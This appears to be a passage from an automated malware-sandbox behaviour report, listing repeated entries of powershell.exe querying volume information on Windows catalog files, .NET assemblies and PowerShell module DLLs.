      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
